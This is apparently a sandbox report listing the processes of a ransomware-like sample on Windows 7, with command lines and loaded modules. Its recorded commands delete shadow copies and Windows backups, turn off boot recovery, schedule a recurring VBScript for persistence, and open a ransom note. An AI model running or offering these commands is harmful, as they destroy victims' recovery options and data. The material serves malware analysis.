c:\program files\videolan\vlc\plugins\audio_filter\libdolby_surround_decoder_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libugly_resampler_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libaudio_format_plugin.dll
c:\windows\system32\avrt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll

PID
2120
CMD
"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
840
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2888
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1576
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbadmin.exe

PID
1724
CMD
bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3048
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbadmin.exe

PID
2072
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete backup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2844
CMD
bcdedit /set vbwfatdjw recoveryenabled no
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
2180
CMD
wbadmin delete catalog -quiet
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
2716
CMD
"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\vssadmin.exe

PID
2768
CMD
wbadmin delete systemstatebackup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll

PID
1980
CMD
wbadmin delete backup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll

PID
2404
CMD
vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\vssadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
1972
CMD
SndVol.exe -f 46138548 29801
Path
C:\Windows\system32\SndVol.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Volume Mixer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sndvol.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\audioses.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll

PID
1952
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\Desktop\READ_ME_NOW.htm
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sxs.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\url.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\nlaapi.dll

PID
2944
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:144385 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\ntmarta.dll
c:\windows\syswow64\wldap32.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\oleacc.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll

PID
596
CMD
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
Path
C:\Windows\system32\mmc.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
3221226540
Version:
Company
Microsoft Corporation
Description
Microsoft Management Console
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll

PID
2360
CMD
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
Path
C:\Windows\system32\mmc.exe
Indicators
Parent process
––
User
admin
Integrity Level
HIGH
Version:
Company
Microsoft Corporation
Description
Microsoft Management Console
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\cmd.exe
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\conhost.exe
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mfc42u.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\odbc32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\mmcbase.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\duser.dll
c:\windows\system32\imm32.dll
c:\windows\system32\odbcint.dll
c:\windows\system32\dui70.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mmcndmgr.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\miguiresource.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\mlang.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\system32\sxs.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mmcex\43e41e76df61e51ec5697bffd6305357\mmcex.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mmcfxcommon\a69fdb8d83766e888a267e918f352abd\mmcfxcommon.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.drawing\1deaddfc41ab5efdec9a9b9faa759ada\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.windows.forms\e339f1036b8eb2c6be74704608908927\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\microsoft.net\framework64\v2.0.50727\diasymreader.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.managemen#\2d61188e8d276b33baa851e130a85120\microsoft.managementconsole.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\taskscheduler\8e5b3871639503250afc8dc86c878be7\taskscheduler.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\miguicontrols\3f5dd9d8b94bf201dd20485165cafc9a\miguicontrols.ni.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\comdlg32.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\custommarshalers\b78c08ac57ef3ed0fa122669719a89db\custommarshalers.ni.dll
c:\windows\assembly\gac_64\custommarshalers\2.0.0.0__b03f5f7f11d50a3a\custommarshalers.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\riched20.dll

PID
2676
CMD
